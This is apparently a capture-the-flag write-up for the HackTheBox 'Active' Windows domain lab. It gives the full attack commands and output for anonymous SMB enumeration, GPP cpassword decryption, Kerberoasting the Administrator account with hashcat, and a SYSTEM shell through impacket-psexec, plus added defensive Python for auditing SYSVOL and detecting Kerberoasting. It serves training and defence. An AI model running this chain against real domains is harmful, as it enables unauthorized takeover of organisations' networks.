Active: Easy Windows Active Directory (HackTheBox). Tags: GPP / MS14-025, Kerberoasting
Easy Windows Active Directory machine covering two foundational AD attack techniques found in real-world engagements. Anonymous SMB access to a Replication share (a SYSVOL mirror) exposes a Groups.xml file containing a GPP-encrypted password (cpassword). Decrypting it with the publicly-known AES key gives domain credentials for SVC_TGS. That account can Kerberoast the Administrator SPN — the resulting TGS hash cracks in seconds, and impacket-psexec delivers a SYSTEM shell.
User Flag
bcc2c4eff3xxxxxxxxxxxxxxxxxxxxxx
Root Flag
f07d33f967xxxxxxxxxxxxxxxxxxxxxx
01 Reconnaissance

Full port scan paints a clear DC picture. Domain is active.htb, OS is Windows Server 2008 R2 SP1. One notable absence: no port 5985 — WinRM is not enabled. evil-winrm is out; we'll need psexec or wmiexec once we have credentials.

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.2.51
53/tcp   open  domain        Windows DNS
88/tcp   open  kerberos-sec  Windows KDC
389/tcp  open  ldap          Active Directory (Domain: active.htb)
445/tcp  open  microsoft-ds  Windows Server 2008 R2 SP1 SMB
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
464/tcp  open  kpasswd5
593/tcp  open  ncacn_http    RPC over HTTP
636/tcp  open  tcpwrapped    LDAPS
no WinRM: Port 5985 is not open. evil-winrm will fail. Once we have admin credentials we'll use impacket-psexec over SMB instead.
env setup
$ echo "10.129.2.51 active.htb dc.active.htb" | sudo tee -a /etc/hosts
$ export IP=10.129.2.51
$ export DOMAIN=active.htb
02 SMB Enumeration — Anonymous Access to Replication

Null session (empty username/password) works against SMB. The share list reveals a non-default share called Replication with anonymous read access. In many older domain environments this is a mirror of SYSVOL — the share that holds Group Policy data for all machines in the domain.

nxc — null auth share enum
$ nxc smb $IP -u '' -p '' --shares
ADMIN$        (no access)
C$            (no access)
IPC$          READ
NETLOGON      (no access)
Replication   READ
SYSVOL        (no access)
Users         (no access)

Connect and recursively download everything from the Replication share to inspect offline.

smbclient — recursive download
$ smbclient //$IP/Replication -N
smb: \> cd active.htb
smb: \active.htb\> recurse on
smb: \active.htb\> prompt off
smb: \active.htb\> mget *
finding: the Replication share mirrors SYSVOL — it contains the full Group Policy directory tree for the domain. When you see an unfamiliar share, always download everything and inspect offline.
03 GPP Password Exposure — MS14-025

Among the downloaded files is a Group Policy Preferences XML file containing a cpassword field — an AES-256 encrypted password. Microsoft used this to push local account credentials via Group Policy, but critically they published the AES key in their own documentation. Any cpassword value is trivially decryptable.

Groups.xml — cpassword field
$ cat active.htb/Policies/\{31B2F340-016D-11D2-945F-00C04FB984F9\}/MACHINE/Preferences/Groups/Groups.xml
userName="active.htb\SVC_TGS"
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
gpp-decrypt
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
nxc — validate credentials
$ nxc smb $IP -u SVC_TGS -p 'GPPstillStandingStrong2k18'
[+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
credential: SVC_TGS:GPPstillStandingStrong2k18. MS14-025 (2014) removed the ability to set new passwords through Group Policy Preferences, but the Groups.xml files already sitting in SYSVOL were never cleaned up — this is why the vulnerability still appears in real engagements years later.
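The defender-side check for this finding, as an added example that is not part of the original writeup: a Python script that walks a SYSVOL copy (or the downloaded Replication tree) and reports every Group Policy Preferences item that still carries a cpassword attribute, so the file can be removed and the account's password rotated. It does not decrypt anything; the sample tree, the second policy GUID and the cpassword blob it builds are constructed placeholders.

```python
"""Audit a SYSVOL tree (or a downloaded Replication mirror) for Group Policy
Preferences files that still carry a cpassword attribute (MS14-025 leftovers).
Added example, not from the original writeup; the sample tree is constructed."""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP preference files that can embed an encrypted password.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml", "DataSources.xml", "Drives.xml"}

def find_gpp_credentials(root):
    """One finding per preference item (<User>, <Service>, ...) whose Properties carry cpassword."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            for item in ET.parse(path).iter():
                for props in item:
                    cpw = props.attrib.get("cpassword")
                    if cpw is None:
                        continue
                    account = props.attrib.get("userName") or props.attrib.get("accountName", "<unknown>")
                    findings.append({"file": os.path.relpath(path, root), "item": item.tag,
                                     "account": account, "cpassword_len": len(cpw)})
    return findings

# Constructed, trimmed Groups.xml; a real one carries many more attributes.
GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups><User name="active.htb\SVC_TGS">
  <Properties action="U" {CPW}userName="active.htb\SVC_TGS"/>
</User></Groups>"""

def build_sample_tree():
    """Two policies: one with a leftover cpassword (placeholder blob), one already clean."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    for guid, cpw in (("{31B2F340-016D-11D2-945F-00C04FB984F9}", "PLACEHOLDER_CPASSWORD_BLOB"),
                      ("{00000000-0000-0000-0000-0000000CLEAN}", None)):
        d = os.path.join(root, "Policies", guid, "MACHINE", "Preferences", "Groups")
        os.makedirs(d)
        with open(os.path.join(d, "Groups.xml"), "w") as fh:
            fh.write(GROUPS_XML.replace("{CPW}", f'cpassword="{cpw}" ' if cpw else ""))
    return root

if __name__ == "__main__":
    for f in find_gpp_credentials(build_sample_tree()):
        print(f"[!] {f['file']}: {f['item']} {f['account']} still has a cpassword")
```

Point find_gpp_credentials() at a real SYSVOL copy; every hit is a credential to rotate and a file to delete, whether or not anyone has decrypted it yet.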
04 User Flag

With valid credentials the Users share is now readable. The user flag is on SVC_TGS's desktop.

smbclient — Users share
$ smbclient //$IP/Users -U 'SVC_TGS%GPPstillStandingStrong2k18'
smb: \> cd SVC_TGS\Desktop
smb: \SVC_TGS\Desktop\> get user.txt
bcc2c4eff3xxxxxxxxxxxxxxxxxxxxxx
05 Kerberoasting — Administrator SPN

Kerberoasting abuses a Kerberos design feature: any authenticated domain user can request a TGS ticket for any SPN. The ticket is encrypted with a key derived from the service account's password (for RC4, that key is the account's NT hash). By requesting it and cracking offline, you never interact with the account directly and trigger no lockouts.

The account name SVC_TGS (Service Account Ticket Granting Service) is a hint that Kerberoasting is the intended path.

GetUserSPNs — enumerate + request TGS
$ impacket-GetUserSPNs $DOMAIN/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip $IP -request
ServicePrincipalName  Name           MemberOf
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,...

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$9df8f0b1...d44e8d
finding: the domain Administrator account has an SPN registered (active/CIFS:445). This is unusual — privileged accounts with SPNs are prime Kerberoast targets. The hash type is etype 23 (RC4), the most crackable variant.
hashcat — crack TGS hash
$ hashcat -m 13100 admin_hash.txt /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*Administrator$ACTIVE.HTB$...:Ticketmaster1968
credential: Administrator:Ticketmaster1968 — cracked in ~4 seconds. Ticketmaster1968 is in rockyou.txt. Service accounts (especially privileged ones) must have long random passwords; gMSAs rotate them automatically.
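Detection for the request above, as an added example not from the original writeup: the TGS request lands on the DC as Security event 4769, and Python over such records (constructed here, with field names following the event's XML) can flag RC4 (0x17) tickets issued for non-machine accounts and the many-accounts-from-one-client sweep that GetUserSPNs -request produces. The privileged watch-list, client IPs and timestamps are assumptions.

```python
"""Flag Kerberoasting in Windows Security event 4769 (TGS request) records.
Added example, not from the original writeup; the records below are
constructed in the shape a SIEM exports, not real logs."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"               # etype 23, the crackable variant seen above
PRIVILEGED = {"administrator"}  # constructed watch-list; extend per domain

def detect_kerberoast(events, window=timedelta(minutes=5), burst=5):
    """Rule 1: a successful RC4 TGS for any non-machine account (HIGH if privileged).
    Rule 2: one client IP pulling tickets for >= `burst` distinct services inside
    `window`, the GetUserSPNs -request sweep pattern."""
    alerts, by_ip = [], defaultdict(list)
    for ev in events:
        if ev["EventID"] != 4769 or ev["Status"] != "0x0":
            continue
        svc = ev["ServiceName"].split("@")[0]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue            # computer accounts and TGTs are routine noise
        by_ip[ev["IpAddress"]].append((ev["Time"], svc))
        if ev["TicketEncryptionType"] == RC4_HMAC:
            sev = "HIGH" if svc.lower() in PRIVILEGED else "MEDIUM"
            alerts.append(f"{sev}: RC4 TGS for {svc} requested by "
                          f"{ev['TargetUserName']} from {ev['IpAddress']}")
    for ip, reqs in by_ip.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            svcs = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(svcs) >= burst:
                alerts.append(f"HIGH: {ip} requested {len(svcs)} distinct service "
                              f"tickets within {window} (Kerberoast sweep)")
                break
    return alerts

def rec(minute, user, svc, etype, ip):  # constructed 4769 record
    return {"EventID": 4769, "Status": "0x0", "TargetUserName": user, "ServiceName": svc,
            "TicketEncryptionType": etype, "IpAddress": ip, "Time": datetime(2024, 1, 1, 9, minute)}

# Constructed sample: routine machine-account TGS, the RC4 request for the
# Administrator SPN seen above, an AES request, then a five-account sweep.
SAMPLE = [rec(0, "jdoe@ACTIVE.HTB", "DC$", "0x12", "10.129.2.60"),
          rec(1, "SVC_TGS@ACTIVE.HTB", "Administrator", RC4_HMAC, "10.10.14.5"),
          rec(2, "jdoe@ACTIVE.HTB", "sqlsvc", "0x12", "10.129.2.60"),
          *(rec(3, "SVC_TGS@ACTIVE.HTB", f"svc{i}", RC4_HMAC, "10.10.14.5") for i in range(5))]

if __name__ == "__main__":
    print("\n".join(detect_kerberoast(SAMPLE)))
```

Moving service accounts to AES-only (msDS-SupportedEncryptionTypes) makes rule 1 fire on every legacy RC4 request, which is exactly the traffic a Kerberoaster depends on.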
06 SYSTEM — impacket-psexec

No WinRM means no evil-winrm. impacket-psexec authenticates over SMB, uploads a service binary to ADMIN$, registers it as a service and spawns a SYSTEM shell, because the service it creates runs as LocalSystem (NT AUTHORITY\SYSTEM).

psexec → SYSTEM
$ impacket-psexec administrator:Ticketmaster1968@$IP
[*] Found writable share ADMIN$
[*] Uploading file MCFRbGkM.exe
[*] Creating service srDK on 10.129.2.51
Microsoft Windows [Version 6.1.7601]

C:\Windows\system32> whoami
nt authority\system
root flag
C:\> cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt
f07d33f967xxxxxxxxxxxxxxxxxxxxxx
encoding errors: cosmetic only — Server 2008 uses a different code page. Commands still execute correctly.
07 Full Attack Chain
attack chain summary
Nmap → DC identified, domain: active.htb, Server 2008 R2, no WinRM
  │
  ▼
SMB null auth → Replication share readable anonymously
  (Replication = SYSVOL mirror with Group Policy data)
  │
  ▼
Groups.xml → cpassword field for SVC_TGS
gpp-decrypt → SVC_TGS:GPPstillStandingStrong2k18
  │
  ▼
Users share now readable → user.txt ✓
  │
  ▼
GetUserSPNs → Administrator has SPN (active/CIFS:445)
TGS ticket requested → Kerberos RC4 hash extracted
  │
  ▼
hashcat -m 13100 (4 seconds) → Administrator:Ticketmaster1968
  │
  ▼
impacket-psexec → SYSTEM shell → root.txt ✓
key takeaways:
· GPP passwords (MS14-025) used a published AES key — any cpassword in SYSVOL is fully decryptable
· Even post-patch, old Groups.xml files left in SYSVOL remain exploitable indefinitely
· Kerberoasting is noise-free — TGS requests look like normal Kerberos traffic
· Privileged accounts (especially Administrator) must never have SPNs unless absolutely required
· Service account passwords should be 30+ random characters; use gMSAs for auto-rotation
· No WinRM → psexec/wmiexec/smbexec over SMB are the alternatives